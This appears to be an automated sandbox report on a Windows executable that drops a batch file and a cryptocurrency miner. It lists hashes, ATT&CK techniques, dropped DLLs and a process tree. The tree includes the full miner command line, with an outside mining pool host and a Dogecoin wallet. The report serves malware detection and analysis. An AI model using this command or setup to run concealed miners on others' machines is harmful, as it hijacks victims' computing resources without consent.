73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
303s
max time network
310s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1456	b2e.exe
2808	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
2808	cpuminer-sse2.exe
2808	cpuminer-sse2.exe
2808	cpuminer-sse2.exe
2808	cpuminer-sse2.exe
2808	cpuminer-sse2.exe
2808	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2812-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 1456	2812	batexe.exe	91
PID 2812 wrote to memory of 1456	2812	batexe.exe	91
PID 2812 wrote to memory of 1456	2812	batexe.exe	91
PID 1456 wrote to memory of 5048	1456	b2e.exe	92
PID 1456 wrote to memory of 5048	1456	b2e.exe	92
PID 1456 wrote to memory of 5048	1456	b2e.exe	92
PID 5048 wrote to memory of 2808	5048	cmd.exe	95
PID 5048 wrote to memory of 2808	5048	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6193.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe

Filesize
1.5MB

MD5
ed49e64858f09e8bb98f1c92bf02656a

SHA1
ee1e750eb686d4eff88eb4b6fecec440e0440a8f

SHA256
ff19d322dadb5c7e27592e14976d042e07ec8f9874fdb57a407dcf9198de520e

SHA512
7de0cd5e85ec6b0dbd7f2d5f93fee8d96bd28dcf7a55550495e1b010527f7c71fd17f7598410df8897e583468d6745554474a91646dc68da2a4834096bc5359e

Download Submit
C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe

Filesize
2.7MB

MD5
559eb15606638964ea60e9ce08e7ce16

SHA1
a7f3dac770e8007a3d41611996bca877e3f09ada

SHA256
d208ae92d969519cd6b53a809b7e2beb6e90835f737b1800499bbfc7b79c189d

SHA512
269511d35732f27610f94b562bca83b17f0b15d19a5456bdd11af7f0cacb35ade5a0eac347959a891c36e01840db117dbd673785d03448df5b44b494d22c5a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\50EA.tmp\b2e.exe

Filesize
2.6MB

MD5
3813bdb1c62b8bd9ed3b620aced927e9

SHA1
743b2b74042fc533efb4fac86ab83258d71d9dcd

SHA256
10bf273aa5d8a90c63adc1a084764d5fc620a84b7c5bb91dae8ccf6336ac77ab

SHA512
a96ba7474aca119c470d12b48f4493358642e945af0fd0bff0029b1bf0761025ef6e279675f3154b7fae121317c2d3f43d558d81ae617ef79de5b61e1c26c2ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\6193.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
766KB

MD5
89a6fa21221dea7eab8ad1ba1e61e82b

SHA1
a47e556c5c0ce7028a7dfb653c23963f48a931fb

SHA256
41d2334f405cbbea6a79912df890e4b7c745d951e791630c19dc6fab2025c9df

SHA512
7f7cc556ea75167044aca8fd936860196b434a7a5a2cf3d4b4824f1011673fee9318aaa7136a70bbd64b524e1181011c0f25cec95241a502c1914f4c50b685e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
747KB

MD5
5cb91c9b28b4fb274cab4afaf3fa2b6c

SHA1
74588daa9316e731bebb7618ba26acab6621ba00

SHA256
53a8bcbabdafebcc2ad9ae3cc34e971d694a66dfb59da8931781ba421ad4c6f0

SHA512
539de3e67eb95e53f18208fb34340d9a993d333f3f9e053a584497ed573afb7380f22594a48405de351e0984097794f24a6c5f782c3d92b89c17c8e25e5b3bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
665KB

MD5
0f41a1a015a6414c6af89baebed96ad8

SHA1
51cedf27b9de3690a9f2735e221675f3b122ae35

SHA256
751adca7401fa0b3443536d7fce3b23d86af383eb1d665b2dbe4837d4403caea

SHA512
861caefe21ffebb00d68bae84f4a7d02f254f66d736cf081b24ba1f9370d1e0d54b900936f6b5977f38e370a16dc7ddd8cd4ddc57217c7941036882de2aa101f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
441KB

MD5
986b8593f9ee122f26e22c162058e67f

SHA1
58c85de5660d793b56db60bb53de7dc45484d8a3

SHA256
fda47f28506b3263eac1ea1a13ba9cdd62aae122da19531de7baf2e40775bb16

SHA512
19d033c9caabd5a62081410d5d41edc3651678b6385ed226a04e5e4982a4cf0502dd37b679f2244ea4ad3b99a14ccd01564e43ad5eccaa5777a495daf478c295

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
480KB

MD5
22110bcdff73a5c6dd209e671f226f22

SHA1
5c27ad2ec624bbab0474e09344c542658bfd1996

SHA256
4a60ed3955584c419875c1e5f63cf9499875a194dfc3590cc4fd97da346cf53c

SHA512
e6f0ec6e0388edd69ddb64cb635c91695fb701e58a15715f7d9a8db50f6571ff262421dfab20c5ccc184dfb7084a516a4c16d6de52bf077afd5bbff371708e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
407KB

MD5
38517dc3bc95cfc3d3b537b0a02bdb7c

SHA1
90a2adc6c823e8fb858387befdd8c89b946e0388

SHA256
00876ac1fa80252c6c6571d8275fe3591a9c7710b549959277f7cb0c0fa2dd81

SHA512
29714ab4cc1eae94ed0af0390e310acec0448c9218c222a16a3fb035479aad0c5b7ef034a4eda7486a6befd698603473481b93a69ec5f2bbecf1af9e3899cd76

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
473KB

MD5
b68821b00af33e0778c0ff183ecb1240

SHA1
7262a6ba9824453a2b5a09570d6ddb0e65c835c2

SHA256
ba58d269917e01402eb33041967b615179840f34e0afb495f3e1fd36f79896a7

SHA512
838340ef9a3644105a78329bef106e444f1e030857ae47febe55fee0cd1ec2037f79b00291ace647708800281949a03529fdbc671038f3163d04affe4d5d5663

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
511KB

MD5
ee15a43749081c820c52f99b36b3ea8f

SHA1
a952472977ef81d1daeeff8d8d1c6d245fe59a7b

SHA256
40f1c6d0b87836408ddb32d448f2376a5d0efa6182c0af6bf77170329fe4909c

SHA512
46ac43234962a4660541e7c0751471d162cf5f3e6f2b01b771f9413a9e69ec468f8a1431728f6e69b7e7fac764529c7975e8512bc351ceaf67a53e120b834a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
672KB

MD5
86e16474997a6ac928c0f43a44ffa618

SHA1
731cfbdb59a4a247227bfd4c026f5f8f43d212a2

SHA256
9e72823930eed5a15f769aa7634301b91dd0fa3982949648ef7f44df2d0a7964

SHA512
2b2172804d15ddff2a441c13443c57120cf64d8e964e1310545b76a25bd8a3f820be22d4912449fba01cfca2c7300d9e038c0ae8a48d78f24cba7e66fc2dcbc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
694KB

MD5
57b9cd9427f2c455701767ba954565d6

SHA1
5c38aa527e685245c89c49cbd5ff6de709c7e0bd

SHA256
c6c4b34bcdb4d06e5bcb81aa9ff3ce540349132845b371c62ba8d2d92e199894

SHA512
8995e3595fa21c25f34504e1e29aa0c251d74846f458a32daf256afcfb709e8a30f9ba8c89a55acb1bae95a85124febbf476e5ce22e1a7b1f0cea3280b979a37

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
346KB

MD5
51c36d6a4ef11b3074bc5ba9fd2326d2

SHA1
9f0cf18953b5a86ad6685662dce0326f0c4c9ba4

SHA256
07de6bc2dddc17ac86674f12eadb8b3729d25b33cfb89e64d4b4984116a8d84f

SHA512
7c4d0c737a113b283d62daf9ff2e51138c9f69657b4b042510e7b163efc065b4c1bbc116135217590ffdf563fc577816a233647fc93de2b9eaf26cc3302a345d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
425KB

MD5
aed747d77099be40f511df5302080950

SHA1
0138986e32ecb802a5ad947ba5ceb17bc9d09e1a

SHA256
70ef262755aec290aab7a2c4cffa3eb2d5b8cd098214c802a9da53e66ee90754

SHA512
97abe4660f419f5d47bfc792b0aa48feb690f1ad40567433ea383bdd57c2d4a9bee0ee6d538e7ef04ef5876e64dda950518f8dcc7fe2d7bf547fb4a6c582f0b7

Download Submit
memory/1456-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1456-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2808-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2808-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2808-49-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/2808-48-0x0000000000D40000-0x0000000000DFC000-memory.dmp

Filesize
752KB

Download
memory/2808-42-0x0000000000D40000-0x0000000000DFC000-memory.dmp

Filesize
752KB

Download
memory/2808-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/2808-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2808-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2808-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2808-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2808-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2812-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download